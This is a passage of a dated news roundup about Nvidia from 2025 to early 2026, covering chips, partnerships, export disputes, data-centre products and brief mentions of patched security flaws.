<p><em>January 26, 2026</em>: <a href="https://www.networkworld.com/article/4121983/nvidia-is-still-working-with-suppliers-on-ram-chips-for-rubin.html">Nvidia changed its requirements for suppliers </a>of the next generation of high-bandwidth memory, HBM4, but is close to certifying revised chips from Samsung Electronics for use in its AI systems, according to reports.</p>



<h3 class="wp-block-heading">RISC-V chip designer SiFive integrates Nvidia NVLink Fusion to power AI data centers</h3>



<p><em>January 19, 2026</em>: RISC-V pioneer SiFive has signed a deal with Nvidia to <a href="https://www.networkworld.com/article/4118823/risc-v-chip-designer-sifive-integrates-nvidia-nvlink-fusion-to-power-ai-data-centers.html">incorporate Nvidia NVLink Fusion into its data center products</a>.The agreement means that SiFive will be able to connect its RISC-V CPUs to Nvidia GPUs and accelerators over a high bandwidth interconnect that lets multiple GPUs share compute and memory resources.</p>



<h3 class="wp-block-heading">Nvidia H200 chips in China: US says yes, China says no</h3>



<p>January 14, 2026: In what appears to be a case of diplomatic mind games in action, one day after the US government issued a regulation clearing the way for <a href="https://www.networkworld.com/article/4117031/yea-or-nay-will-nvidia-h200-chips-go-to-china.html">Nvidia to sell its H200 AI processors to Chinese companies</a> on a case-by-case basis, a published report has revealed Chinese custom officers have been told not to let them into the country.</p>



<h3 class="wp-block-heading">Lenovo-Nvidia partnership targets faster AI infrastructure rollouts</h3>



<p><em>January 7, 2026</em>: Lenovo is pairing its liquid-cooled systems and networking with Nvidia platforms to deliver what it calls <a href="https://www.networkworld.com/article/4113692/lenovo-nvidia-partnership-targets-faster-ai-infrastructure-rollouts.html">“AI cloud gigafactories</a>” designed to reduce deployment timelines from months to weeks.</p>



<h3 class="wp-block-heading">Top 10 Nvidia stories of 2025 – From the data center to the AI factory</h3>



<p><em>December 26, 2025</em>:  For Nvidia, 2025 was not just about faster GPUs. It was about the<strong> </strong><a href="https://www.networkworld.com/article/4111630/top-10-nvidia-stories-of-2025-from-data-center-to-ai-factory.html">fundamental re-architecture of the enterprise data center</a> from a storage/retrieval hub to a manufacturing plant for intelligence – or the AI factory.</p>



<h3 class="wp-block-heading">Nvidia moves deeper into AI infrastructure with SchedMD acquisition</h3>



<p><em>December 16, 2025</em>:  <a href="https://www.networkworld.com/article/4106930/nvidia-moves-deeper-into-ai-infrastructure-with-schedmd-acquisition.html">Nvidia has taken a strategic step deeper into the AI software stack </a>with its acquisition of SchedMD, the developer of Slurm, a widely used open-source workload manager for high-performance computing and AI clusters.</p>



<h3 class="wp-block-heading">Nvidia bets on open infrastructure for the agentic AI era with Nemotron 3</h3>



<p><em>December 15, 2025:</em> <a href="https://www.infoworld.com/article/4106756/nvidia-bets-on-open-infrastructure-for-the-agentic-ai-era-with-nemotron-3.html">AI agents must be able to cooperate, coordinate, and execute</a> across large contexts and long time periods, and this, says Nvidia, demands a new type of infrastructure, one that is open.</p>



<h3 class="wp-block-heading">HPE loads up AI networking portfolio, strengthens Nvidia, AMD partnerships</h3>



<p><em>December 2, 2025</em>: HPE unveiled a wide range of networking gear and software to help enterprise customers move efficiently into the AI networking era. The rollout includes new switches and routers as well as <a href="https://www.networkworld.com/article/4099698/hpe-loads-up-ai-networking-portfolio-strengthens-nvidia-amd-partnerships.html">deepened HPE’s partnerships with AMD and Nvidia</a>. </p>



<h3 class="wp-block-heading">Nvidia’s $2B Synopsys stake tests independence of open AI interconnect standard</h3>



<p><em>December 2, 2025</em>:<a href="https://www.networkworld.com/article/4099517/nvidias-2b-synopsys-stake-tests-independence-of-open-ai-interconnect-standard.html"> Nvidia announced a $2 billion investment in Synopsys</a>, a chip design software maker, placing the GPU giant in the unusual position of holding substantial equity in a company that serves on the board of an industry consortium developing technology that competes with Nvidia’s own interconnect technology.</p>



<h3 class="wp-block-heading">Nvidia chips sold out? Cut back on AI plans, or look elsewhere</h3>



<p><em>November 20, 2025</em>: Nvidia CFO Colette Kress’s claim that “The clouds are sold out, and our GPU-installed base […] is fully utilized,” may have thrilled shareholders listening to the company’s earnings call on Wednesday, but it’s bad news for CIOs and data center managers who were <a href="https://www.networkworld.com/article/4094308/nvidia-chips-sold-out-cut-back-on-ai-plans-or-look-elsewhere-2.html">counting on Nvidia for increased AI computing capacity</a>.</p>



<h3 class="wp-block-heading">Nvidia’s first exascale system is the 4th fastest supercomputer in the world</h3>



<p><em>November 17, 2025:</em> The world’s fourth exascale supercomputer has arrived, <a href="https://www.networkworld.com/article/4091320/nvidias-first-exascale-system-is-the-4th-fastest-supercomputer-in-the-world.html">pitting Nvidia’s proprietary chip technologies against the x86 systems</a> that have dominated supercomputing for decades. </p>



<h3 class="wp-block-heading">Nvidia touts next-gen quantum computing interconnects</h3>



<p><em>November 17, 2025</em>: At this week’s Supercomputing Conference, Nvidia highlighted how it expects to<a href="https://www.networkworld.com/article/4091472/nvidia-touts-next-gen-quantum-computing-interconnects.html"> accelerate computing to quantum processors</a> in the future.</p>



<h3 class="wp-block-heading">Nvidia highlights considerable science-based supercomputing efforts</h3>



<p><em>November 17, 2025</em>: <a href="https://www.networkworld.com/article/4091479/nvidia-highlights-considerable-science-based-supercomputing-efforts.html">Nvidia announced that more than 80 science-oriented systems</a> powered by its platform have been deployed around the globe in the last year, at a combined total of 4,500 exaFLOPs of AI performance.</p>



<h3 class="wp-block-heading">Next-generation HPE supercomputer offers a mix of Nvidia and AMD silicon</h3>



<p><em>November 14, 2025:</em> Hewlett Packard Enterprise said its next-generation Cray supercomputing platform will offer a <a href="https://www.networkworld.com/article/4090269/next-generation-hpe-supercomputer-offers-a-mix-of-nvidia-and-amd-silicon.html">choice of processors from Nvidia and AMD</a>, even though the chips aren’t available yet and the system is likely not going to be available until 2027.</p>



<h3 class="wp-block-heading">Cisco, Nvidia strengthen AI ties with new data center switch, reference architectures</h3>



<p><em>October 29, 2025</em>:<a href="https://www.networkworld.com/article/4080722/cisco-nvidia-strengthen-ai-ties-with-new-data-center-switch-reference-architectures.html"> Cisco and Nvidia are ramping up their partnership</a>. The latest deliverables include the new Cisco N9100 series data center switch built on Nvidia’s Spectrum-X Ethernet switch silicon. The two vendors also unveiled reference architectures to guide customer AI implementations of Cisco and Spectrum-X networks.</p>



<h3 class="wp-block-heading">Nvidia looks to power AI factory networks</h3>



<p><em>October 28, 2025</em>: Networking technology took center stage at Nvidia’s GTC DC developers show as a range of networking products were introduced for high-performance AI inference processing and more. The spotlight was on the<a href="https://www.networkworld.com/article/4080459/nvidia-looks-to-power-ai-factory-networks.html"> launch of the ConnectX-9 SuperNIC</a>. This next-generation network interface card delivers 1.6T GPU, with advanced RDMA capabilities and PCIe Gen 6 support.</p>



<h3 class="wp-block-heading">Quantum Circuits brings dual-rail qubits to Nvidia’s CUDA-Q development platform</h3>



<p><em>October 28, 2025</em>: Quantum Circuits announced that its dual-rail Seeker quantum processing unit now supports Nvidia’s CUDA-Q programming language, a move designed to help developers<a href="https://www.networkworld.com/article/4079693/quantum-circuits-brings-dual-rail-qubits-to-nvidias-cuda-q-development-platform.html"> combine quantum computing with AI and machine learning workloads</a> as the two technologies increasingly intersect.</p>



<h3 class="wp-block-heading">Should enterprise developers care about Nvidia?</h3>



<p><em>October 21, 2025</em>:  If you’re a Java developer at a bank or a JavaScript developer at a retailer, you’ve probably spent your career blissfully ignoring hardware.That’s what the cloud is for. <a href="https://www.infoworld.com/article/4075017/should-enterprise-developers-care-about-nvidia.html">And Nvidia? That was just for gamers</a>, crypto miners, or those PhDs in the AI lab playing with massive models. Except, it’s not anymore.</p>



<h3 class="wp-block-heading">Nvidia, Infineon partner for AI data center power overhaul</h3>



<p>October 16, 2025: <a href="https://www.networkworld.com/article/4074085/nvidia-infineon-partner-for-ai-data-center-power-overhaul.html">Infineon is teaming up with Nvidia</a> to upgrade the outdated power architecture of AI data centers and replace them with a centralized high-voltage DC power setup.</p>



<h3 class="wp-block-heading">Nvidia’s DGX Spark desktop supercomputer is on sale now, but hard to find</h3>



<p>O<em>ctober 15, 2025</em>: <a href="http://nvidia%E2%80%99s%20%E2%80%9Cpersonal%20ai%20supercomputer,%E2%80%9D%20the%20dgx%20spark,%20may%20run%20fast%20but%20it%E2%80%99s%20been%20slow%20getting%20here.%20it%20finally%20went%20on%20sale%20on%20oct.%2015,%20five%20months%20later%20than%20the%20company%20initially%20promised,%20and%20early%20units%20are%20hard%20to%20find/">Nvidia’s “personal AI supercomputer,” the DGX Spark</a>, may run fast but it’s been slow getting here. It finally went on sale today, five months later than the company initially promised, and early units are hard to find: </p>



<h3 class="wp-block-heading">Inside Nvidia’s ‘grid-to-chip’ vision: How Vera Rubin and Spectrum-XGS advanceAI giga-factories</h3>



<p><em>October 13, 2025</em>: Nvidia will be front-and-center at this week’s Global Summit for members of the Open Compute Project. The company is making announcements on several fronts, including the debut of Vera Rubin MGX, its <a href="https://www.networkworld.com/article/4072947/nvidias-dgx-spark-desktop-supercomputer-is-on-sale-now-but-hard-to-find-2.html">next-gen architecture fusing CPUs and GPUs</a>, and Spectrum-XGS Ethernet, a networking fabric designed for “giga-scale” AI factories.</p>



<h3 class="wp-block-heading">Nvidia and Fujitsu team for vertical industry AI projects</h3>



<p><em>October 6, 2025</em>: Nvidia has partnered with Fujitsu to collaborate on vertical industry-specific artificial intelligence projects. The partnership will focus on co-developing and delivering an<a href="https://www.networkworld.com/article/4068325/nvidia-and-fujitsu-team-for-vertical-industry-ai-projects.html"> AI agent platform tailored for industry-specific agents</a> in sectors such as healthcare, manufacturing, and robotics.</p>



<h3 class="wp-block-heading">Nvidia and OpenAI open $100B, 10 GW data center alliance</h3>



<p><em>September 23, 2025</em>: <a href="https://www.networkworld.com/article/4061728/nvidia-and-openai-open-100b-10-gw-data-center-alliance.html">OpenAI and Nvidia will create a strategic partnership</a> to deploy at least 10 gigawatts of Nvidia systems for OpenAI’s next-generation AI infrastructure.The first phase is expected to come online in the second half of 2026 using Nvidia’s Vera Rubin CPU/GPU combination platform to train and run new models.</p>



<h3 class="wp-block-heading">Who wins/loses with the Intel-Nvidia union?</h3>



<p><em>September 22, 2025:</em> Nvidia is dipping into its $56 billion bank account to acquire a <a href="https://www.networkworld.com/article/4061020/who-wins-loses-with-the-intel-nvidia-union.html">5% stake in Intel</a> for $5 billion, making it the second largest shareholder of Intel stock after the federal government’s recent investment. The deal provides Nvidia greater access to the x86 ecosystem, important for the enterprise data center market, and provides Intel with access to GPUs that have demand and can move their CPU products as well.</p>



<h3 class="wp-block-heading">Nvidia reportedly acquires Enfabrica CEO and chip technology license</h3>



<p><em>September 19, 2025</em>: <a href="https://www.networkworld.com/article/4060214/nvidia-reportedly-acquires-enfabrica-ceo-and-chip-technology-license.html">Nvidia has hired away the CEO and other staff of chip interconnect maker Enfabrica,</a> and licensed its core technologies in a deal worth over $900 million, Behind the move is demand for computing capacity to power generative AI for the likes of OpenAI, Anthropic, Mistral, AWS, Microsoft, and Google.</p>



<h3 class="wp-block-heading">Intel will design CPUs with Nvidia NVLink in return for $5 billion investment</h3>



<p><em>September 18, 2025</em>: Intel will collaborate with Nvidia to design CPUs with Nvidia’s NVLink high-speed chip interconnect. <a href="https://www.networkworld.com/article/4059448/intel-will-design-cpus-with-nvidia-nvlink-in-return-for-5-billion-investment.html">Nvidia and Intel </a>also agreed to “jointly develop multiple generations of custom data center and PC products,” they said in a joint statement.</p>



<h3 class="wp-block-heading">China’s strike on Nvidia threatens global AI supply chains, sparking enterprise concerns</h3>



<p><em>September 16, 2025</em>: <a href="https://www.networkworld.com/article/4057726/chinas-strike-on-nvidia-threatens-global-ai-supply-chains-sparking-enterprise-concerns.html">China has accused Nvidia of breaching its anti-monopoly law</a>, a move that could disrupt the chipmaker’s global operations and heighten risks for enterprises dependent on its GPUs as US-China trade tensions escalate.</p>



<h3 class="wp-block-heading">Nvidia rolls out new GPUs for AI inferencing, large workloads</h3>



<p><em>September 9, 2025</em>: <a href="https://www.networkworld.com/article/4053902/nvidia-rolls-out-new-gpus-for-ai-inferencing-large-workloads.html">Nvidia has taken the wraps off a new purpose-built GPU</a> along with a next-generation platform specifically targeted at massive-context processing as well as token software coding and generative video.       </p>



<h3 class="wp-block-heading">Cadence adds Nvidia to digital twin tool for data center design</h3>



<p><em>September 9, 2025</em>: Cadence has updated to its <a href="https://www.networkworld.com/article/4053966/cadence-adds-nvidia-to-digital-twin-tool-for-data-center-design.html">Cadence Reality Digital Twin Platform library</a> with the addition of digital twins for Nvidia’s DGX SuperPOD with DGX GB200 systems.</p>



<h3 class="wp-block-heading">Nvidia networking roadmap: Ethernet, InfiniBand, co-packaged optics will shape data center of the future</h3>



<p><em>September 4, 2025</em>: <a href="https://www.networkworld.com/article/4050881/nvidia-networking-roadmap-ethernet-infiniband-co-packaged-optics-will-shape-data-center-of-the-future.html">Nvidia’s networking roadmap</a> is based on data centers evolution into a new unit of computing, from a focus on CPUs to GPUs as the primary computing units and from the distribution of functions across different components to support the infrastructure for AI workload</p>



<h3 class="wp-block-heading">Nvidia’s new computer gives AI brains to robots</h3>



<p>August 25, 2025: Nvidia CEO Jensen Huang sees a future where billions of robots serve humans, bringing in trillions of dollars in revenue for the company. To meet that goal, Nvidia on Monday <a href="https://www.computerworld.com/article/4045542/nvidias-new-computer-gives-ai-brains-to-robots.html">unveiled a new computing device</a> that will go into high-performing robots that could then try to replicate human behavior.</p>



<h3 class="wp-block-heading">Nvidia turns to software to speed up its data center networking hardware for AI</h3>



<p><em>August 22, 2025</em>: Nvidia wants to make long-haul <a href="https://www.networkworld.com/article/4044525/nvidia-turns-to-software-to-speed-up-its-data-center-networking-hardware-for-ai.html">GPU-to-GPU communication over Ethernet </a>faster and more reliable, and hopes to achieve that with its new Spectrum-XGS algorithms, software protocols baked into Nvidia’s latest Ethernet gear. .</p>



<h3 class="wp-block-heading">Nvidia: ‘Graphics 3.0’ will drive physical AI productivity</h3>



<p><em>August 15, 2025</em>: Nvidia has floated the idea of “Graphics 3.0” with the hope of making AI-generated graphics central to physical productivity. The concept revolves around graphics created by genAI tools.<a href="https://www.computerworld.com/article/4040351/nvidia-graphics-3-0-will-drive-physical-ai-productivity.html"> Nvidia say AI-generated graphics could help in training robots</a> to do their jobs in the physical world or by helping AI assistants automate the creation of equipment and structures.</p>



<h3 class="wp-block-heading">Nvidia launches Blackwell-powered RTX Pro GPUs for compact AI workstations</h3>



<p><em>August 12, 2025</em>: Nvidia announced two new professional GPUs, the RTX Pro 4000 Small Form Factor (SFF) and the RTX Pro 2000. Built on its Blackwell architecture, <a href="https://www.networkworld.com/article/4038209/nvidia-launches-blackwell-powered-rtx-pro-gpus-for-compact-ai-workstations.html">Nvidia’s new GPUs aim to deliver powerful AI capabilities</a> in compact desktop and workstation deployments.</p>



<h3 class="wp-block-heading">Nvidia’s new genAI model helps robots think like humans</h3>



<p>August 11, 2025: <a href="https://www.computerworld.com/article/4037662/nvidias-new-genai-model-helps-robots-think-like-humans.html">Nvidia has developed a genAI model</a> to help robots make human-like decisions by analyzing surrounding scenes. The Cosmos Reason model in robots can take in information from video and graphics input, analyze the data, and use its understanding to make decisions.</p>



<h3 class="wp-block-heading">Nvidia patches critical Triton server bugs that threaten AI model security</h3>



<p><em>August 5, 2025</em>: A <a href="https://www.csoonline.com/article/4034219/nvidia-patches-critical-triton-server-bugs-that-threaten-ai-model-security.html">surprising attack chain in Nvidia’s Triton Inference Server</a>, starting with a seemingly minor memory-name leak, could allow full remote server takeover without user authentication.</p>



<h3 class="wp-block-heading">China demands ‘security evidence’ from Nvidia over H20 chip backdoor fears</h3>



<p><em>August 4, 2025</em>: <a href="https://www.networkworld.com/article/4033508/china-demands-security-evidence-from-nvidia-over-h20-chip-backdoor-fears.html">China escalated pressure on Nvidia</a> with the state-controlled People’s Daily publishing an opinion piece titled “Nvidia, how can I trust you?” — a day after regulators summoned company officials over alleged security vulnerabilities in H20 artificial intelligence chips.</p>



<h3 class="wp-block-heading">Nvidia to restart H20 exports to China, unveils new export-compliant GPU</h3>



<p><em>July 15, 2025:</em> <a href="https://www.networkworld.com/article/4022357/nvidia-to-restart-h20-exports-to-china-unveils-new-export-compliant-gpu.html">Nvidia will restart H20 AI chip sales to China</a> and release a new GPU model compliant with export rules, a move that could impact global AI hardware strategies for enterprise IT teams. Nvidia has applied for US approval to resume sales and says that the government has indicated licenses will be granted and deliveries could begin soon.</p>



<h3 class="wp-block-heading">Nvidia GPUs are vulnerable to Rowhammer attacks</h3>



<p><em>July 15, 2025:</em> Nvidia has issued a security reminder to application developers, computer manufacturers, and IT leaders that modern memory chips in graphic processors are potentially susceptible to so-called Rowhammer exploits after Canadian university researchers proved that an <a href="https://www.csoonline.com/article/4022877/alert-nvidia-gpus-are-vulnerable-to-rowhammer-attacks.html">Nvidia A6000 GPU could be successfully compromised</a> with a similar attack.</p>



<h3 class="wp-block-heading">Nvidia hits $4T market cap as AI, high-performance semiconductors hit stride</h3>



<p><em>July 11, 2025</em>: Nvidia became the first publicly traded company to surpass a $4 trillion market capitalization value, 13 months after surpassing the $3 trillion mark. This makes <a href="https://www.networkworld.com/article/4021007/nvidia-hits-4t-market-cap-as-ai-high-performance-semiconductors-hit-stride.html">Nvidia the world’s most valuable company</a> ahead of Apple and Microsoft.</p>



<h3 class="wp-block-heading">New Nvidia technology provides instant answers to encyclopedic-length questions</h3>



<p><em>Jul 8, 2025: </em>Have a question that needs to process an encyclopedia-length dataset? Nvidia says its new technique can answer it instantly. Built leveraging the company’s Blackwell processor’s capabilities, the new <a href="https://www.computerworld.com/article/4019170/new-nvidia-technology-provides-instant-answers-to-encyclopedic-length-questions.html">“Helix Parallelism” method</a> allows AI agents to process millions of words — think encyclopedia-length — and support up to 32x more users at a time.</p>



<h3 class="wp-block-heading">Nvidia doubles down on GPUs as a service</h3>



<p><em>July 8, 2025:</em> Nvidia’s recent initiative to <a href="https://www.infoworld.com/article/4017785/nvidia-doubles-down-on-gpus-as-a-service.html">dive deeper into the GPU-as-a-service (GPUaaS) model </a>marks a significant and strategic shift that reflects an evolving landscape within the cloud computing market. </p>



<h3 class="wp-block-heading">Nvidia, Perplexity to partner with EU and Middle East AI firms to build sovereign LLMs</h3>



<p><em>June 12, 2025: </em>Nvidia and AI search firm Perplexity said they are joining hands with model builders and cloud providers across Europe and the Middle East <a href="https://www.computerworld.com/article/4005901/nvidia-perplexity-to-partner-with-eu-and-middle-east-ai-firms-to-build-sovereign-llms.html">to refine sovereign large-language models</a> (LLMs) and accelerate enterprise AI uptake in local industries.</p>



<h3 class="wp-block-heading">Nvidia: ‘Sovereign AI’ will change digital work</h3>



<p><em>June 11, 2025: </em>Nvidia executives think sovereign AI has the <a href="https://www.computerworld.com/article/4005083/nvidia-sovereign-ai-will-change-digital-work.html">potential to change digital work</a> as generative AI (genAI) aligns with national priorities and local regulations.</p>



<h3 class="wp-block-heading">AWS cuts prices of some EC2 Nvidia GPU-accelerated instances</h3>



<p><em>June 9, 2025</em>: <a href="https://www.networkworld.com/article/4003551/aws-cuts-prices-of-some-ec2-nvidia-gpu-accelerated-instances.html">AWS has reduced the prices of some of its Nvidia GPU-accelerated</a> instances to attract more AI workloads while competing with rivals, such as Microsoft and Google, as demand for GPUs and the cost of securing them continues to grow.</p>



<h3 class="wp-block-heading">Nvidia aims to bring AI to wireless</h3>



<p><em>June 6, 2025</em>: <a href="https://www.networkworld.com/article/4003219/nvidia-aims-to-bring-ai-to-wireless.html">Nvidia hopes to maximize RAN infrastructure use</a> (traditional networks average a low 30% to 35%), use AI to rewrite the air interface, and enhance performance and efficiency through radio signal processing. The longer-term goal is to seamlessly process AI traffic at the network edge to create new monetization opportunities for service providers.</p>



<h3 class="wp-block-heading">Oracle to spend $40B on Nvidia chips for OpenAI data center in Texas</h3>



<p>May 26, 2025:  Oracle is reportedly spending <a href="https://www.networkworld.com/article/3995015/oracle-to-spend-40b-on-nvidia-chips-for-openai-data-center-in-texas.html">about $40 billion on Nvidia’s high-performance computer chips </a>to power OpenAI’s new data center in Texas, marking a pivotal shift in the AI infrastructure landscape that has significant implications for enterprise IT strategies.</p>



<h3 class="wp-block-heading">Nvidia eyes China rebound with stripped-down AI chip tailored to export limits</h3>



<p><em>May 26, 2025: </em>Nvidia plans to launch a <a href="https://www.networkworld.com/article/3994927/nvidia-eyes-china-rebound-with-stripped-down-ai-chip-tailored-to-export-limits.html#:~:text=Nvidia%20plans%20to%20launch%20a,impact%20global%20enterprise%20AI%20spending.">lower-cost AI chip for China</a> in June, aiming to <a href="https://www.computerworld.com/article/3964093/nvidia-loses-over-50-billion-as-us-further-curbs-chip-exports-to-china.html?utm=hybrid_search" target="_blank">protect market share</a> under the US export controls and signal a broader shift toward affordable, segmented products that could impact global enterprise AI spending.</p>



<h3 class="wp-block-heading">Nvidia introduces ‘ridesharing for AI’ with DGX Cloud Lepton</h3>



<p><em>May 19, 2025</em>: <a href="https://www.networkworld.com/article/3989615/nvidia-introduces-ridesharing-for-ai-with-dgx-cloud-lepton.html">Nvidia introduced DGX Cloud Lepton</a>, an AI-centric cloud software program that makes it easier for AI factories to rent out their hardware to developers who wish to access performant compute globally.</p>



<h3 class="wp-block-heading">Nvidia opens NVLink to competitive processors</h3>



<p>May 19, 2025: Nvidia kicked off the Computex systems hardware tradeshow with the news it has <a href="https://www.networkworld.com/article/3989598/nvidia-opens-nvlink-to-competitive-processors.html">opened the NVLink interconnect technology</a> to the competition with the introduction of NVLink Fusion. NVLink is a high-speed interconnect born out of its Mellanox networking group which lets multiple GPUs in a system or rack share compute and memory resources, thus making many GPUs appear to the system as a single processor.</p>



<h3 class="wp-block-heading">AMD, Nvidia partner with Saudi startup to build multi-billion dollar AI service centers</h3>



<p><em>May 15, 2025</em>: As part of the avalanche of business deals coming from President Trump’s Middle East tour, both <a href="https://www.networkworld.com/article/3986905/amd-nvidia-partner-with-saudi-startup-to-build-multi-billion-dollar-ai-service-centers.html">AMD  and Nvidia have struck multi-billion dollar deals with an emerging Saudi AI firm.</a> The deals served as the coming out party for <a href="https://www.cio.com/article/3984044/humain-saudi-arabias-bold-bet-on-sovereign-ai-and-arabic-llms.html">Humain</a>, a state-backed artificial intelligence (AI) company that operates under the Kingdom’s Public Investment Fund (PIF) and is chaired by Crown Prince Mohammed bin Salman. </p>



<h3 class="wp-block-heading">Nvidia, ServiceNow engineer open-source model to create AI agents</h3>



<p><em>May 6, 2025</em>: Nvidia and ServiceNow have created an AI model that can help companies create learning AI agents to automate corporate workloads..The <a href="https://www.computerworld.com/article/3978481/nvidia-servicenow-engineer-open-source-model-to-create-ai-agents.html">open-source Apriel model,</a> available generally in the second quarter on HuggingFace, will help create AI agents that can make decisions around IT, human resources and customer-service functions. </p>



<h3 class="wp-block-heading">Nvidia AI supercluster targets agents, reasoning models on Oracle Cloud</h3>



<p><em>April 29, 2025</em>: The move marks the first wave of liquid-cooled <a href="https://www.networkworld.com/article/3973909/nvidia-ai-supercluster-targets-agents-reasoning-models-on-oracle-cloud.html">Nvidia GB200 NVL72 racks in OCI data centers</a>, involving thousands of Nvidia Grace CPUs and Blackwell GPUs. </p>



<h3 class="wp-block-heading">Nvidia says NeMo microservices now generally available</h3>



<p><em>April 23, 2025</em>: Nvidia announced the <a href="https://www.cio.com/article/3968114/nvidia-says-nemo-microservices-now-generally-available.html">general availability of neural module (NeMo) microservices</a>, a modular platform for building and customizing gen AI models and AI agents.NeMo microservices integrate with partner platforms to provide features including prompt tuning, supervised fine-tuning, and knowledge retrieval tools.</p>



<h3 class="wp-block-heading">Nvidia expects ban on chip exports to China to cost $5.5B</h3>



<p><em>April 16, 2025: </em>Nvidia now expects new US government restrictions on exports of its H20 chip to China will cost the company <a href="https://www.computerworld.com/article/3964093/nvidia-loses-over-50-billion-as-us-further-curbs-chip-exports-to-china.html">as much as $5.5 billion</a>.</p>



<h3 class="wp-block-heading">Incomplete patching leaves Nvidia, Docker exposed to DOS attacks</h3>



<p><em>April 15, 2025:</em> A critical race condition bug affecting the Nvidia Container Toolkit, which received a fix in September, might <a href="https://www.csoonline.com/article/3962744/incomplete-patching-leaves-nvidia-docker-exposed-to-dos-attacks.html">still be open to attacks</a> owing to incomplete patching.</p>



<h3 class="wp-block-heading">Nvidia lays out plans to build AI supercomputers in the US</h3>



<p><em>April 14, 2025</em>: There was mixed reaction from industry analysts over an announcement that<a href="https://www.networkworld.com/article/3562856/nvidia-latest-news-and-insights.html"> Nvidia plans to produce AI supercomputers entirely in the US.</a>  The company said in a blog post that, together with its manufacturing partners, it has commissioned more than one million square feet (92,900 square meters) of manufacturing space to build and test Nvidia Blackwell chips in Arizona and AI supercomputers in Texas.</p>



<h3 class="wp-block-heading">Potential Nvidia chip shortage looms as Chinese customers rush to beat US sales ban</h3>



<p><em>April 2, 2025: </em>The AI chip shortage could become even more dire as <a href="https://www.networkworld.com/article/3952994/potential-nvidia-chip-shortage-looms-as-chinese-customers-rush-to-beat-us-sales-ban.html">Chinese customers are purportedly looking to hoard Nvidia chips </a>ahead of a proposed US sales ban. According to inside sources, Chinese companies including ByteDance, Alibaba Group, and Tencent Holdings have ordered at least $16 billion worth of Nvidia’s H20 server chips for running AI workloads in just the first three months of this year.</p>



<h3 class="wp-block-heading">Nvidia’s Blackwell raises the bar with new MLPerf Inference V5.0 results</h3>



<p><em>April 2, 2025:</em> Nvidia released a set of <a href="https://www.networkworld.com/article/3952638/nvidias-blackwell-raises-the-bar-with-new-mlperf-inference-v5-0-results.html">MLPerf Inference V5.0 benchmark results for its Blackwell GPU</a>, the successor to Hopper, saying that its GB200 NVL72 system, a rack-scale offering designed for AI reasoning, set a series of performance records.</p>



<h3 class="wp-block-heading">5 big takeaways from Nvidia GTC</h3>



<p><em>March 25, 2025: </em>Now that the dust has settled from <a href="https://www.networkworld.com/article/3833841/nvidia-gtc-2025-what-to-expect-from-the-ai-leader.html">Nvidia’s GTC 2025</a>, a few industry experts weighed in on some core <a href="https://www.networkworld.com/article/3853773/five-big-takeaways-from-nvidia-gtc.html">big picture developments</a> from the conference. Here are five of their top observations.</p>



<h3 class="wp-block-heading">Nvidia wants to be a one-stop enterprise technology shop</h3>



<p><em>March 24, 2025</em>: After last week’s <a href="https://www.networkworld.com/article/3833841/nvidia-gtc-2025-what-to-expect-from-the-ai-leader.html">Nvidia GTC 2025 event</a>, a new, fuller picture of the vendor emerged. Analysts agree that <a href="https://www.networkworld.com/article/3852810/nvidia-wants-to-be-a-one-stop-enterprise-technology-shop.html">Nvidia is not just a graphics chip provider </a>anymore. It’s a full-stack solution provider, and GPUs are just one of many parts.</p>



<h3 class="wp-block-heading">Nvidia launches AgentIQ toolkit to connect disparate AI agents</h3>



<p><em>March 21, 2025</em>: As enterprises look to <a href="https://www.infoworld.com/article/3851326/nvidia-launches-agentiq-toolkit-to-connect-disparate-ai-agents.html">adopt agentic AI to boost the efficiency</a> of their applications, Nvidia introduced a new open-source software library — AgentIQ toolkit — to help developers connect disparate agents and agent frameworks. The toolkit, according to Nvidia, packs in a variety of tools, including ones to weave in RAG, search, and conversational UI into agentic AI applications.</p>



<h3 class="wp-block-heading">Nvidia launches research center to accelerate quantum computing breakthrough</h3>



<p><em>March 21, 2025</em>: In a move to help accelerate the timeline for practical, real-world quantum applications, Nvidia is establishing the <a href="https://www.networkworld.com/article/3851393/nvidia-launches-research-center-to-accelerate-quantum-computing-breakthrough.html">Nvidia Accelerated Quantum Research Center</a>. “Quantum computing will augment AI supercomputers to tackle some of the world’s most important problems,” Nvidia CEO Jensen Huang said.</p>



<h3 class="wp-block-heading">Nvidia, xAI and two energy giants join genAI infrastructure initiative</h3>



<p><em>March 19, 2025:</em> An industry generative artificial intelligence (genAI) alliance, the <a href="https://www.networkworld.com/article/3849735/nvidia-xai-and-two-energy-giants-join-genai-infrastructure-initiative.html">AI Infrastructure Partnership</a> (AIP), on Wednesday announced that xAI, Nvidia, GE Vernova, and NextEra Energy were joining BlackRock, Microsoft, and Global Infrastructure Partners as members.</p>



<h3 class="wp-block-heading">IBM broadens access to Nvidia technology for enterprise AI</h3>



<p><em>March 19, 2025: </em>New <a href="https://www.networkworld.com/article/3849538/ibm-broadens-access-to-nvidia-technology-for-enterprise-ai.html">collaborations between IBM and Nvidia</a> have yielded a content-aware storage capability for IBM’s hybrid cloud infrastructure, expanded integration between watsonx and Nvidia NIM, and AI services from IBM Consulting that use Nvidia Blueprints.</p>



<h3 class="wp-block-heading">Nvidia’s silicon photonics switches bring better power efficiency to AI data centers</h3>



<p><em>March 19, 2025: </em>Amid the flood of news from Nvidia’s annual GTC event, one item stood out. Nvidia introduced <a href="https://www.networkworld.com/article/3849490/nvidias-silicon-photonics-switches-bring-better-power-efficiency-to-ai-data-centers.html">new silicon photonics network switches</a> that integrate network optics into the switch using a technique called co-packaged optics (CPO), replacing traditional external pluggable transceivers. While Nvidia alluded to its new switches providing a cost savings, the primary benefit is to reduce power consumption with an improvement in network resiliency.</p>



<h3 class="wp-block-heading">What is Nvidia Dynamo and why it matters to enterprises?</h3>



<p><em>March 19, 2025: </em>Chipmaker Nvidia has released a new <a href="https://www.networkworld.com/article/3849341/what-is-nvidia-dynamo-and-why-it-matters-to-enterprises.html">open-source inferencing software</a> — Dynamo, at its <a href="https://www.networkworld.com/article/3833841/nvidia-gtc-2025-what-to-expect-from-the-ai-leader.html">GTC 2025</a> conference, that will allow enterprises to increase throughput and reduce cost while using large language models on Nvidia GPUs.</p>



<h3 class="wp-block-heading">Nvidia, xAI and two energy giants join genAI infrastructure initiative</h3>



<p><em>March 19, 2025: </em> AI Infrastructure Partnership (AIP) announced that <a href="https://www.networkworld.com/article/3849735/nvidia-xai-and-two-energy-giants-join-genai-infrastructure-initiative.html">xAI, Nvidia, GE Vernova, and NextEra Energy joined the AIP</a>. But given that no financial commitments or any other details were released, will it make a difference?</p>



<h3 class="wp-block-heading">HPE, Nvidia broaden AI infrastructure lineup</h3>

